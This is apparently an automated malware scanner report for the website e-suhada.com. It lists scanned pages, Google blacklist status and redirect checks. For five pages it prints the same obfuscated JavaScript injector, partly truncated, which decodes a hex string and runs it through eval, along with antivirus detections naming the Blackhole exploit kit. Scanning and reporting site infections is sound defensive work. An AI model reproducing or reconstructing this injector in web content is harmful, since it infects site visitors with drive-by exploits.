Malware Scanner report for e-suhada.com

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "e-suhada.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=e-suhada.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.e-suhada.com/	200 OK Content-Length: 16407 Content-Type: text/html	clean
http://www.e-suhada.com/basket.cgi	200 OK Content-Length: 27572 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) cfa="s"+"p"+"li"+"t";quxfv=window;nlwdya="dy";qoqxvp=document;qacp="0x";srxq=(5-3-1);try{++(qoqxvp.body)}catch(xechhk){jdm=false;try{}catch(ksqkx){jdm=21;}if(1){flfsx="17:5d:6c:65:5a:6b:60:66:65:17:60:6c:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:6c:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c ... 3448 bytes are skipped ...3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:6c:60:27:30:1f:20:32:4:1:74:4:1:74"[cfa](":");}quxfv=flfsx;urbz=[];for(zxc=22-20-2;-zxc+1395!=0;zxc+=1){vkyda=zxc;if((0x19==031))urbz+=String["fromCharCode"](eval(qacp+quxfv[1*vkyda])+0xa-srxq);}evtuhl=eval;evtuhl(urbz)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD TrendMicro-HouseCall TROJ_GEN.F47V1025 Emsisoft JS:Exploit.BlackHole.BD (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.mc DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.BlackHole.BD AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG
http://www.e-suhada.com/test404page.js	404 Not Found Content-Length: 13 Content-Type: text/html	clean
http://www.e-suhada.com/syohin.html	200 OK Content-Length: 26329 Content-Type: text/html	clean
http://www.e-suhada.com/neutoha.html	200 OK Content-Length: 23780 Content-Type: text/html	clean
http://www.e-suhada.com/koe.html	200 OK Content-Length: 15374 Content-Type: text/html	clean
http://www.e-suhada.com/handneu.html	200 OK Content-Length: 18375 Content-Type: text/html	clean
http://www.e-suhada.com/faneu.html	200 OK Content-Length: 33548 Content-Type: text/html	clean
http://www.e-suhada.com/bodyneu.html	200 OK Content-Length: 13680 Content-Type: text/html	clean
http://www.e-suhada.com/haneu.html	200 OK Content-Length: 14095 Content-Type: text/html	clean
http://www.e-suhada.com/hyouji.html	200 OK Content-Length: 7299 Content-Type: text/html	clean
http://www.e-suhada.com/m/	200 OK Content-Length: 7073 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) cfa="s"+"p"+"li"+"t";quxfv=window;nlwdya="dy";qoqxvp=document;qacp="0x";srxq=(5-3-1);try{++(qoqxvp.body)}catch(xechhk){jdm=false;try{}catch(ksqkx){jdm=21;}if(1){flfsx="17:5d:6c:65:5a:6b:60:66:65:17:60:6c:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:6c:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c ... 3448 bytes are skipped ...3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:6c:60:27:30:1f:20:32:4:1:74:4:1:74"[cfa](":");}quxfv=flfsx;urbz=[];for(zxc=22-20-2;-zxc+1395!=0;zxc+=1){vkyda=zxc;if((0x19==031))urbz+=String["fromCharCode"](eval(qacp+quxfv[1*vkyda])+0xa-srxq);}evtuhl=eval;evtuhl(urbz)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD TrendMicro-HouseCall TROJ_GEN.F47V1025 Emsisoft JS:Exploit.BlackHole.BD (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.mc DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.BlackHole.BD AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG
http://www.e-suhada.com/m_category_list.cgi?CategoryID=0&BasketSessionID=<!--::Text{BasketSessionID_Val}::-->	200 OK Content-Length: 5841 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) cfa="s"+"p"+"li"+"t";quxfv=window;nlwdya="dy";qoqxvp=document;qacp="0x";srxq=(5-3-1);try{++(qoqxvp.body)}catch(xechhk){jdm=false;try{}catch(ksqkx){jdm=21;}if(1){flfsx="17:5d:6c:65:5a:6b:60:66:65:17:60:6c:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:6c:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c ... 3448 bytes are skipped ...3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:6c:60:27:30:1f:20:32:4:1:74:4:1:74"[cfa](":");}quxfv=flfsx;urbz=[];for(zxc=22-20-2;-zxc+1395!=0;zxc+=1){vkyda=zxc;if((0x19==031))urbz+=String["fromCharCode"](eval(qacp+quxfv[1*vkyda])+0xa-srxq);}evtuhl=eval;evtuhl(urbz)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD TrendMicro-HouseCall TROJ_GEN.F47V1025 Emsisoft JS:Exploit.BlackHole.BD (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.mc DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.BlackHole.BD AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG
http://www.e-suhada.com/m_category_list.cgi?CategoryID=2&BasketSessionID=	200 OK Content-Length: 6054 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) cfa="s"+"p"+"li"+"t";quxfv=window;nlwdya="dy";qoqxvp=document;qacp="0x";srxq=(5-3-1);try{++(qoqxvp.body)}catch(xechhk){jdm=false;try{}catch(ksqkx){jdm=21;}if(1){flfsx="17:5d:6c:65:5a:6b:60:66:65:17:60:6c:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:6c:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c ... 3448 bytes are skipped ...3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:6c:60:27:30:1f:20:32:4:1:74:4:1:74"[cfa](":");}quxfv=flfsx;urbz=[];for(zxc=22-20-2;-zxc+1395!=0;zxc+=1){vkyda=zxc;if((0x19==031))urbz+=String["fromCharCode"](eval(qacp+quxfv[1*vkyda])+0xa-srxq);}evtuhl=eval;evtuhl(urbz)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD TrendMicro-HouseCall TROJ_GEN.F47V1025 Emsisoft JS:Exploit.BlackHole.BD (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.mc DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.BlackHole.BD AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG
http://www.e-suhada.com/m_goods_detail.cgi?CategoryID=2&GoodsID=3&BasketSessionID=	200 OK Content-Length: 6236 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) cfa="s"+"p"+"li"+"t";quxfv=window;nlwdya="dy";qoqxvp=document;qacp="0x";srxq=(5-3-1);try{++(qoqxvp.body)}catch(xechhk){jdm=false;try{}catch(ksqkx){jdm=21;}if(1){flfsx="17:5d:6c:65:5a:6b:60:66:65:17:60:6c:60:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:6c:60:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c ... 3448 bytes are skipped ...3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:6c:60:27:30:1f:20:32:4:1:74:4:1:74"[cfa](":");}quxfv=flfsx;urbz=[];for(zxc=22-20-2;-zxc+1395!=0;zxc+=1){vkyda=zxc;if((0x19==031))urbz+=String["fromCharCode"](eval(qacp+quxfv[1*vkyda])+0xa-srxq);}evtuhl=eval;evtuhl(urbz)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD TrendMicro-HouseCall TROJ_GEN.F47V1025 Emsisoft JS:Exploit.BlackHole.BD (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.mc DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.BlackHole.BD AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: e-suhada.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: e-suhada.com
Referer: http://www.google.com/search?q=e-suhada.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for e-suhada.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools